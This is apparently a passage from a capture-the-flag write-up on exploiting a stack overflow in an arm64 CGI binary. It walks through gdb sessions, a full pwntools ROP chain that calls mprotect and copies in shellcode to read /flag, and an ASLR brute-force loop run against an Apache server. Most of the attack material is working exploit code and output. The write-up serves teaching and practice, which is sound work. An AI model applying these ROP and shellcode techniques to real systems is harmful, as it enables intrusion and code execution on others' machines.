0x0000000000440408 in is_trusted_path_normalize ()
(gdb) x /6i $pc
=> 0x440408 <is_trusted_path_normalize+280>: mov sp, x29
0x44040c <is_trusted_path_normalize+284>: ldp x19, x20, [sp, #16]
0x440410 <is_trusted_path_normalize+288>: ldp x21, x22, [sp, #32]
0x440414 <is_trusted_path_normalize+292>: ldp x23, x24, [sp, #48]
0x440418 <is_trusted_path_normalize+296>: ldp x29, x30, [sp], #64
0x44041c <is_trusted_path_normalize+300>: ret
(gdb) si
0x000000000044040c in is_trusted_path_normalize ()
(gdb) p /x $sp
$13 = 0x55007ce090
(gdb) x /10gx $sp
0x55007ce090: 0x00000000deadbeef 0x00000000004057dc # x29, x30
0x55007ce0a0: 0x00000000deadbeef 0x00000000deadbeef # x19, x20
0x55007ce0b0: 0x00000000deadbeef 0x00000000deadbeef # x21, x22
0x55007ce0c0: 0x0000000000000007 0x0000000000427d0c # x23, x24
0x55007ce0d0: 0x00000000deadbeef 0x0000000000400684
After a few more instructions, we are in the x2
-load gadget:
(gdb) si
0x00000000004057dc in msort_with_tmp.part ()
(gdb) x /4i $pc
=> 0x4057dc <msort_with_tmp.part.0+156>: mov x2, x23
0x4057e0 <msort_with_tmp.part.0+160>: mov x1, x27
0x4057e4 <msort_with_tmp.part.0+164>: mov x0, x26
0x4057e8 <msort_with_tmp.part.0+168>: blr x24
(gdb) p /x $x23
$14 = 0x7
(gdb) p /x $x24
$15 = 0x427d0c
And from there, we should get to the x16
-branch gadget:
(gdb) x /4i $pc
=> 0x427d0c <__gconv_transform_internal_ucs4le+972>: ldr x16, [sp, #96]
0x427d10 <__gconv_transform_internal_ucs4le+976>: ldp x1, x0, [sp, #120]
0x427d14 <__gconv_transform_internal_ucs4le+980>: ldp x29, x30, [sp], #176
0x427d18 <__gconv_transform_internal_ucs4le+984>: br x16
(gdb) x /6gx $sp + 0x60
0x55007ce130: 0x0000000000420440 0x00000000deadbeef # mprotect addres, _
0x55007ce140: 0x00000000deadbeef 0x0000000000001000 # _, size
0x55007ce150: 0x000000000047d000 0x00000000deadbeef # mapping address
(gdb) x /2gx $sp
0x55007ce0d0: 0x00000000deadbeef 0x0000000000400684 # x29, x30
And from there, to mprotect
:
(gdb) si
0x0000000000420440 in mprotect ()
(gdb) x /5i $pc
=> 0x420440 <mprotect>: nop
0x420444 <mprotect+4>: mov x8, #0xe2 // #226
0x420448 <mprotect+8>: svc #0x0
0x42044c <mprotect+12>: cmn x0, #0xfff
0x420450 <mprotect+16>: b.cs 0x420458 <mprotect+24> // b.hs, b.nlast
(gdb) si
0x0000000000420444 in mprotect ()
(gdb) si
0x0000000000420448 in mprotect ()
(gdb) si
0x0000000000420450 in mprotect ()
(gdb) p /x $x0
$16 = 0x0
mprotect
succeeded ✅︎
We can check that by running it with strace:
>>> print(run_with_strace(payload).decode())
(...)
Content-type: text/html
14230 write(1,0x49b020,24) = 24
14230 write(1,0x49b020,1) = 1
14230 mprotect(0x000000000047d000,4096,PROT_EXEC|PROT_READ|PROT_WRITE) = 0
<h1>Please provide your name with the name= parameter.</h1>
14230 write(1,0x49b020,60) = 60
(...)
Executing our own code
Our goal is to get control over that process. We want to execute arbitrary code, and using rop is tedious. Now that we have a writable and executable region of memory, we can write our own code to it.
Writing a small shellcode
Let’s start by writing a simple shellcode that writes a custom string to stdout.
From the syscalls table, we know that we need to put:
0x40
inx8
0x1
inx0
- a string in
x1
- the size in
x2
Let’s also call exit
so we close the program, that’s 0x5d
def shellcode():
code = pwn.asm("""
mov x8, #0x40
mov x0, #1
adr x1, hello_world
mov x2, #hello_world_len
svc #0
mov x8, #0x5d
mov x0, #0
svc #0
hello_world:
.asciz "Hello, World\\n"
hello_world_len = . - hello_world
""")
return code
Copying the code
Now with the tedious part… We need to copy our code to the executable page… using rop.
We can use a gadget like this one:
0x00000000004450fc:
str x20, [x19, #8];
ldp x19, x20, [sp, #0x10];
ldp x29, x30, [sp], #0x20;
ret;
That writes x20
into the address pointed by x19
+ 8, loads x29
, x30
, x19
, x20
and returns. We can repeat this gadget to copy 8 bytes at a time.
Our first gadget should be a subset of this one, without the write, so we can have control over x19
and x20
:
0x0000000000445100:
ldp x19, x20, [sp, #0x10];
ldp x29, x30, [sp], #0x20;
ret;
So now let’s write our memcpy
implementation!
def memcpy(rop, dst, data, return_addr):
# Callers must start by jumping into `0x445100`
# We have control over everything that's next on the stack.
memcpy_gadget = 0x4450fc
while len(data) > 8:
rop.raw(0xdeadbeef) # x29
rop.raw(memcpy_gadget) # x30
rop.raw(dst - 0x8) # x19
rop.raw(pwn.u64(data[:8])) # x20
dst += 0x8
data = data[8:]
# Copy the last part.
data += b'\x00' * 8
rop.raw(0xdeadbeef) # x29
rop.raw(memcpy_gadget)
rop.raw(dst - 0x8)
rop.raw(pwn.u64(data[:8]))
# This will perform the last store
# And jump to return_addr.
rop.raw(0xdeadbeef)
rop.raw(return_addr)
rop.raw(0xdeadbeef)
rop.raw(0xdeadbeef)
return
Updating our rop-chain
Our updated code looks like this (note that we need to change the puts addr to the memcpy address):
import mmap
def rop():
keyvals = [
b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
]
payload = b'&'.join(keyvals)
payload += b'\x00' * (0x58 - len(payload))
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
mprotect_addr = 0x420440
mapping_addr = 0x47d000
mprotect_size = 0x1000
mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
rop.raw(0xdeadbeef) # x29
rop.raw(0x4057dc) # x30, x2-load gadget
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
rop.raw(0x427d0c) # x24, x16-branch gadget
"""
The x2-load gadget doesn't touch the stack.
It will branch to x24, x16-branch gadget.
0x4057dc:
mov x2, x23;
mov x1, x27;
mov x0, x26;
blr x24;
"""
"""
The x16-branch gadget, loads x16, x1, x0, x29 and x39 from
the stack, advances the stack and branches to x16.
0x427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
"""
rop.raw(0xdeadbeef) # x29
rop.raw(0x00445100) # x30, memcpy addr.
for i in range((0x60-0x10)//8):
rop.raw(0xdeadbeef) # filling until 0x60
rop.raw(mprotect_addr) # sp + 0x60
rop.raw(0xdeadbeef) # sp + 0x68
rop.raw(0xdeadbeef) # sp + 0x70
rop.raw(mprotect_size) # sp + 0x78 x1, size
rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
for i in range((0xb0 - 0x88)//8):
rop.raw(0xdeadbeef) # Filling until 0xb0.
code = shellcode()
memcpy(rop, mapping_addr, code, mapping_addr)
payload += rop.chain()
return payload
>>> payload = rop()
>>> run(payload)
b'Content-type: text/html\n\nHello, World\n\x00'
Printing out the flag.
Now that we can write our own code, to win the challenge we need to print out the flag. So let’s modify our shellcode to openat
(0x38
) the file stored in /flag
, read
it to a stack buffer, and print it via stdout.
Let’s create a temporary flag for now, in /tmp
while we test locally:
$ echo -n "srelabs{fake-flag}" > /tmp/flag
def shellcode():
code = pwn.asm("""
mov x8, #0x40
mov x0, #1
adr x1, hello_world
mov x2, #hello_world_len
svc #0
// Open the flag.
mov x8, #0x38 // SYS_open
mov x0, #-100 // AT_FDCWD
adr x1, flag_path
mov x2, #0 // O_RDONLY
svc #0
// Store the fd on a register.
mov x20, x0
// Read it into the stack.
mov x8, #0x3f // SYS_read
mov x0, x20
sub x1, sp, #0x100
mov x2, #0x100
svc #0
// x0 has the size of the read.
mov x21, x0
// Write it into stdout
mov x8, #0x40
mov x0, #1
sub x1, sp, #0x100
mov x2, x21
svc #0
mov x8, #0x5d
mov x0, #0
svc #0
flag_path:
.asciz "/tmp/flag"
hello_world:
.asciz "Hello, World\\n"
hello_world_len = . - hello_world
""")
return code
>>> payload = rop()
>>> print(run(payload).decode())
Content-type: text/html
Hello, World
srelabs{fake-flag}
Success! ✅︎
Overcoming ASLR
Using a real machine.
At some point, I decided to get a real arm64 machine. Luckily, multiple cloud providers allow you to spawn arm64 instances for cheap. For example, GCE, AWS EC2, Hetzner, and Oracle Cloud. After the vm is provisioned, you can install apache2
and enable the CGI-bin module. With that, you should have a setup very close to the one used in the challenge.
You can use similar scripts to run it locally, or against the http server. For using gdb
I wrote a function that saves the payload to a file and then just run that.
If we try to run our script there, we will see it failing every time: we need to guess the exact layout up to 3 bytes deep. We can maybe shorten that by doing a huge rop-slide, but it’s still too much.
Address Space Layout Assumptions
If we reflect upon our assumptions, the only assumptions that we made were:
- The location of the
x30
register (2 bytes). - The location of the
x29
register (2 bytes). - The location of our read buffer (3 bytes).
The first two are not 2 bytes exactly, as we know they are next to each other, and one ends with an 8 and the other with a 0, so it’s basically 3 nibbles. We can bruteforce that. But guessing the read buffer is more challenging.
I spent a ton of time thinking about this, you can read more in the “Failed experiments” section. But in the end, I decided that it was not feasible to guess the stack address, and that instead, it might be available somehow.
Register State Analysis
I set up a breakpoint at the end of parse_body
, and analyzed both the stack and the registers… And I couldn’t find anything.
I looked for gadgets that would let me add arbitrary stuff to the sp
, which would allow me to get to the read buffer. I found this gadget:
0x000000000042152c:
ldp x29, x30, [sp];
ldr x19, [sp, #0x10];
add sp, sp, x12;
ret;
Which, if we control x12
would let us jump straigth to our buffer. I tried multiple things, but I could not change the value of x12
:
x12 0x5950
Note
In QEMU, it seems like
x12
is modified duringparse_body
, but in the arm VM it does not. This seems to be because in QEMU, libc decides to use__memcpy_generic
duringstrncpy
, whereas in the VM it uses__memcpy_simd
. It is probable that on the real challenge, they also use__memcpy_simd
.
This value is not large enough to reach our read buffer (we need at least 4000*0x34 = 208000
bytes).
However, while testing solutions trying to see what registers we do control, I noticed that if we provide the 0x34
key-value pairs, we get x7
pointing to the position after the last &
. This means that if we find a way to pivot the stack into the value stored in x7
, we should be able to win.
def test_x7():
payloads = [b'a=b&'] * 0x34
payload = b''.join(payloads)
payload += pwn.p32(0xdeadbeef)
return payload
>>> run_with_gdb(test_x7())
(gdb) target remote :1234
Remote debugging using :1234
0x0000000000400700 in _start ()
(gdb) c
Continuing.
Breakpoint 6, 0x0000000000400998 in parse_body ()
(gdb) p /x $x7
$19 = 0x55007ce108
(gdb) x /1gx $x7
0x55007ce108: 0x00000000deadbeef
We now have a register that tells us where the stack is, let’s see if we can do a stack pivot with that somehow.
Hunting for stack pivot gadgets
The first thing we want to see, is if there’s a way to work with x7
. Storing it into the stack, moving it into another register, etc.
I found a few that were not complete garbage:
0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000044615c: str x7, [sp, #0x108]; stp q0, q16, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret;
0x0000000000445fc4: str x7, [sp, #0x108]; stp q16, q17, [x8]; bl #0x45930; ldp x29, x30, [sp], #0x110; ret
The first one in particular seems simple enough: It stores x7
in the stack, then jmps to x24
(which was restored from the stack at the end of parse_body
). So we can use that to chain another rop gadget.
We now need to somehow pick up that value from the stack. We already have a gadget that moves x29
into sp
, so we just need a way to load it into x29
.
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
The first time we execute that rop gadget, we will load x29
and x30
from the stack, and increment the stack by 0x70
. If we execute this gadget twice, the second time the stack would be where we stored x7
, and the value will be loaded into x29
. From there, we can do a normal stack pivot.
So our rop chain now becomes something like this:
0x000000000040597c: str x7, [sp, #0x70]; mov x0, x26; blr x24;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x000000000040c46c: ldp x29, x30, [sp], #0x70; ret;
0x0000000000440408: mov sp, x29; ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x29, x30, [sp], #0x40; ret;
And we need to:
- Override
parse_body
’sx30
in the stack, making it point tox7
-store gadget (0x40597c
). - Override
parse_body
’sx24
in the stack, making it point tostack-advance
gadget (0x40c46c
). - Override
sp + 160 + 0x70 + 0x8
, making it point tostack-advance
gadget. - Override
sp + 160 + 0x70*2 + 0x8
, making it point tostack-pivot
gadget (0x440408
).
It’s a bit tricky, because we need to modify 4 values, and each iteartion of the key-value modification loop advances the pointer by 2000 bytes. However, given that we are modifying 2 bytes, as long as we keep on the same 16-bit boundary, we are fine.
Let’s see an example:
Let’s assume parse_body
’s sp is at 0xffffff50e300
, from there, keys
will be 0xe8
bytes after, so it would be at 0xffffff50e3e8
, and the next pointer will be 2000 bytes from it, at 0xffffff50ebb8
, and so on. The first 6 values will be:
0xffffff50e3e8
0xffffff50ebb8
0xffffff50f388
0xffffff50fb58
0xffffff510328 # <- changes more than 2 bytes
0xffffff510af8
In this particular scenario, we can only write 4 values, but if we get a stack layout starting at a lower number, we would have more opportunities to write. We will explore that after we finish with the exploit.
The values that we need to modify are:
sp + 0x08
(x30
on stack)sp + 0x38
(x24
on stack)sp + 160 + 0x08
(where the third gadget will be loaded from).sp + 160 + 0x70 + 0x08
(where the fourth gadget will be loaded from.)
With our sp
value of 0xffffff50e300
, this will make:
0xffffff50e308
0xffffff50e338
0xffffff50e3a8
0xffffff50e418
However, there’s a problem with these addresses: the second one has a 0x38
byte. It took me a while to debug it, but 0x38
is &
, so that would break everything (remember: we have to avoid NUL
-bytes, &
and =
).
Let’s come up with a different address… like this one: 0xffffe55f9d10
, this will get us:
0xffffe55f9d18
0xffffe55f9d48
0xffffe55f9db8
0xffffe55f9e28
And with that, we can start writing our payload:
def rop():
keyvals = [
b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
]
keyvals += [b'a=b'] * (0x34 - len(keyvals))
# The last entry should leave the stack aligned on a 16-byte boundary.
# As aarch64 will crash if sp si not aligned to 16 bytes.
# the read buffer starts at an address ending with 8, so we need
# to add an extra 8 bytes to align it to 16 bytes.
payload = b'&'.join(keyvals) + b'a='
payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'
"""
If everything went well, we are executing the stack pivot gadget:
0x0000000000440408:
mov sp, x29;
ldp x19, x20, [sp, #0x10];
ldp x21, x22, [sp, #0x20];
ldp x23, x24, [sp, #0x30];
ldp x29, x30, [sp], #0x40;
ret;
Let's try calling the printf function.
"""
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
puts_addr = 0x400684
rop.raw(0xdeadbeef) # x29
rop.raw(puts_addr) # x30
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(0xdeadbeef) # x23
rop.raw(0xdeadbeef) # x24
payload += rop.chain()
return payload
We need to run this in the VM (as it has aslr), and we will fail a lot of times. So let’s write a helper function that collects different messages and only print new messages:
import collections
def run_and_collect(n):
msgs = collections.Counter()
payload = rop()
for i in range(n):
print(f"{i} / {n}", end='\r')
res = run(payload)
msgs.update([res])
for msg, count in msgs.most_common():
print(f"{count}/{n}: {msg}")
9968/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
19/10000: b'Content-type: text/html\n\n'
9/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
4/10000: b'Content-type: text/html\n\n<h1>Please provide your name with the name= parameter.</h1>\n'
4 in 10000, not too good, but also not too bad.
Adding the rest of the rop chain
Now that we found a way to get an exploit that bruteforces aslr, let’s add the rest of the rop chain we had written.
def rop():
keyvals = [
b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(0x9d18),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9d48),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(0x9db8),
b'\x08\x04\x44=' + b'a'*28 + pwn.p16(0x9e28),
]
keyvals += [b'a=b'] * (0x34 - len(keyvals))
# The last entry should leave the stack aligned on a 16-byte boundary.
# As aarch64 will crash if sp si not aligned to 16 bytes.
# the read buffer starts at an address ending with 8, so we need
# to add an extra 8 bytes to align it to 16 bytes.
payload = b'&'.join(keyvals) + b'a='
payload += b'b' * (16 - (len(payload) % 16) - 1) + b'x' * 8 + b'&'
"""
If everything went well, we are executing the stack pivot gadget:
0x0000000000440408:
mov sp, x29;
ldp x19, x20, [sp, #0x10];
ldp x21, x22, [sp, #0x20];
ldp x23, x24, [sp, #0x30];
ldp x29, x30, [sp], #0x40;
ret;
"""
elf = pwn.ELF('./pwn.cgi')
rop = pwn.ROP(elf)
mprotect_addr = 0x420440
mapping_addr = 0x47d000
mprotect_size = 0x1000
mprotect_flags = mmap.PROT_READ|mmap.PROT_WRITE|mmap.PROT_EXEC
rop.raw(0xdeadbeef) # x29
rop.raw(0x4057dc) # x30, x2-load gadget
rop.raw(0xdeadbeef) # x19
rop.raw(0xdeadbeef) # x20
rop.raw(0xdeadbeef) # x21
rop.raw(0xdeadbeef) # x22
rop.raw(mprotect_flags) # x23, x2 in the next gadget. mprotect flags
rop.raw(0x427d0c) # x24, x16-branch gadget
"""
The x2-load gadget doesn't touch the stack.
It will branch to x24, x16-branch gadget.
0x4057dc:
mov x2, x23;
mov x1, x27;
mov x0, x26;
blr x24;
"""
"""
The x16-branch gadget, loads x16, x1, x0, x29 and x39 from
the stack, advances the stack and branches to x16.
0x427d0c:
ldr x16, [sp, #0x60];
ldp x1, x0, [sp, #0x78];
ldp x29, x30, [sp], #0xb0;
br x16;
"""
rop.raw(0xdeadbeef) # x29
rop.raw(0x00445100) # x30, memcpy addr.
for i in range((0x60-0x10)//8):
rop.raw(0xdeadbeef) # filling until 0x60
rop.raw(mprotect_addr) # sp + 0x60
rop.raw(0xdeadbeef) # sp + 0x68
rop.raw(0xdeadbeef) # sp + 0x70
rop.raw(mprotect_size) # sp + 0x78 x1, size
rop.raw(mapping_addr) # sp + 0x80 x0, mapping addr
for i in range((0xb0 - 0x88)//8):
rop.raw(0xdeadbeef) # Filling until 0xb0.
code = shellcode()
memcpy(rop, mapping_addr, code, mapping_addr)
payload += rop.chain()
return payload
Let’s create the fake flag:
echo -n "srelabs{fake-flag}" > /tmp/flag
$ python3 babyarm.py
b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
b'Content-type: text/html\n\n'
b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
b'Content-type: text/html\n\nHello, World\n\x00srelabs{fake-flag}'
Trying it against the webserver.
Now that we have an exploit that seems to work locally, let’s try it against our apache2
server.
$ python3 babyarm.py
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''
It seems like it doesn’t work. We can debug it by attaching strace
to all the apache2
processes and checking out some of the system calls:
$ sudo strace -ffff -e trace=openat,write -p 2289 -p 1167876 -p 1167875 -s 1000 2> syscalls
Then, watched the file until I confirmed that my payload was executing (searched for “Hello”), from there, I saw two errors:
malformed header from script 'pwn.cgi': Bad header: Hello, World\n"
[pid 2193032] openat(AT_FDCWD, "/tmp/flag", O_RDONLY) = -1 ENOENT (No such file or directory)
For the first one, it turns out that if we call write
directly, we might be missing some of the previous buffered output, and the cgi-bin scripts need to start with the Content-type: text/html\n\n
header. We can fix this by adding that to our shellcode:
"""
(...)
hello_world:
.asciz "Content-Type: text/html\\n\\nHello, World\\n"
hello_world_len = . - hello_world
"""
For the second one, it looks like apache2 didn’t have access to the /tmp/flag
file, but I checked and it did. I moved the flag to /flag
and it worked.
$ python3 babyarm.py
b'<h1>What is your name?</h1>\n'
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>500 Internal Server Error</title>\n</head><body>\n<h1>Internal Server Error</h1>\n<p>The server encountered an internal error or\nmisconfiguration and was unable to complete\nyour request.</p>\n<p>Please contact the server administrator at \n webmaster@localhost to inform them of the time this error occurred,\n and the actions you performed just before this error.</p>\n<p>More information about this error may be available\nin the server error log.</p>\n<hr>\n<address>Apache/2.4.52 (Ubuntu) Server at 127.0.0.1 Port 1337</address>\n</body></html>\n'
b''
b'Hello, World\n\x00srelabs{fake-flag}'
And finally, we can try it in the real server… But it will take some time.
Multiple attempts in the same payload.
Before, we observed that if we ended up with a low address in sp
, we could be able to modify that from further down the keys
list. So let’s take advante of that and create a payload that modifies multiple versions of the aspace.
The lowest we can go is 0x0110
, as we cannot use a NUL
-byte. So this leaves us with at most 0x20
entries in the keys area to use, after that, we will always be outside the byte range. So in the end, we can only add 8 payloads:
def first_payload(base_addr):
return [
b'\x7c\x59\x40=' + b'a'*28 + pwn.p16(base_addr + 0x8),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 0x38),
b'\x6c\xc4\x40=' + b'a'*28 + pwn.p16(base_addr + 168),
b'\x08\x04\x44=' + b'a'*28 + pwn.p16(base_addr + 168 + 0x70),
]
def rop():
keyvals = []
keyvals += first_payload(0x0910) # 0x20
keyvals += first_payload(0x0810) # 0x1c
keyvals += first_payload(0x0710) # 0x18
keyvals += first_payload(0x0610) # 0x14
keyvals += first_payload(0x0410) # 0x10
keyvals += first_payload(0x0310) # 0x0c
keyvals += first_payload(0x0210) # 0x08
keyvals += first_payload(0x0110) # 0x04
# rest of the rop code follows (...)
9796/10000: b'Content-type: text/html\n\n<h1>What is your name?</h1>\n'
97/10000: b'Content-type: text/html\n\n'
82/10000: b'Content-type: text/html\n\n*** stack smashing detected ***: terminated\n'
25/10000: b'Content-type: text/html\n\nContent-Type: text/plain\n\nHello, World\n\x00srelabs{fake-flag}'
A bit better. One in 400 tries seems reasonable. When I ran it against the real server, it found the flag in less than 200 tries (lucky, I guess).
b'Hello, World\n\x00SRLABS{______________}\n'
GDB Debugging Tips
Using gdb to debug aslr issues can be cumbersome. Something you can do is re-run the program automatically until we hit our breakpoint.
Retrying after exit / crashes
You can do this with break commands. Set one at _exit
and for all signals:
(gdb) b _exit
Breakpoint 1 at 0x41ebe0
(gdb) commands
Type commands for breakpoint(s) 1, one per line.
End with a line saying just "end".
>run < payload
>end
(gdb) catch signal
Catchpoint 2 (standard signals)
(gdb) commands
Type commands for breakpoint(s) 2, one per line.
End with a line saying just "end".
>run < payload
>end
Conditional Breakpoints
If you are still seeing too much noise, you can also set conditional breakpoint.
Gotchas & Failed Attempts
While working on this challenge, I found some stuff that I wish I knew earlier, and there was also a lot of trial and error. This section describes all of that.
sp
must be aligned to 16 at all times.- The code executed in QEMU and in the VM was different because
glibc
picks which implementation to use for string functions. - The CGI-bin’s output needs to start with
Content-Type: text/plain\n\n
. strace
makes a difference betweenopen
andopenat
.
Failed Experiments
Write to non-stack areas
You can change the value of the keys_ptr
, but you cannot write NUL
-bytes, which means that you can’t go outside of the stack.
Writing into values pointers.
If you provide an empty key, then you can change where the value gets copied to, but there doesn’t seem to be anything you can do there.
Going back to main
or parse_body
.
I kept wanting to reuse main, to read more from the buffer (you can’t because CGI-Bin script), or to reexecute everything with some changes. I couldn’t think of a way to use that.
Environment Variables.
You can control some environment variables, but I couldn’t think how to use them in any meaningful way. I even wrote a test cgi-bin script to print them out and see what can be done. You can’t write NUL
-bytes to them, which limits the amount of stuff you can do.
#include <stdio.h>
int main(int argc, char** argv, char** envp) {
printf("Content-type: text/html\n\n");
printf("stack addr: %p\n", __builtin_frame_address(0));
printf("argc: %d\n", argc);
printf("argv: %p\n", argv);
printf("envp: %p\n", envp);
for (size_t i = 0; argv[i] != NULL; i++) {
printf("argv[%zu] (%p -> %p): %s\n", i, &argv[i], argv[i], argv[i]);
}
for (size_t i = 0; envp[i] != NULL; i++) {
printf("envp[%zu] (%p -> %p): %s\n", i, &envp[i], envp[i], envp[i]);
}
return 0;
}
Sending raw http requests.
I also tried sending manually crafted HTTP requests to the endpoint, thinking that maybe I would be able to see anything different, but I couldn’t.
Stack Layout Analysis.
There seems to be some slight biases towards one set of addresses vs others, but in the end, it didn’t feel like it made a difference.
Pass a huge read buffer.
The read
system call that is done in main
is huge. However, if you pass a huge buffer, it caps at around 32KiB.
Being able to change x12
.
Before finding the issue with strncpy
in QEMU vs the VM, I thought it would be possible to control x12, and I was able to do so in some extent: I could set a full 64 bit value to it, without NUL
-bytes, nor &
, nor =
:
def rop():
keyvals = [
b'\x08\x04\x44=' + b'a'*28 + b'\xd8\xb2',
b'\x90\xe0\x7c=' + b'a'*28 + b'\xd0\xb2',
b'=' + b'\xbc'*18 + pwn.p64(0xdeadbeefabad1dea),
]
And in gdb, after setting up a breakpoint, I can see:
(gdb) p /x $x12
$1 = 0xdeadbeefabad1dea
This meant that we could add something to sp
, but it has to be something huge. Basically, this means we can substract stuff from it. Sadly, our read buffer was after sp
, so substracting stuff didn’t do us any good. I also thought about substracting to the stack after main’s return, but even with that, I was missing another gadget.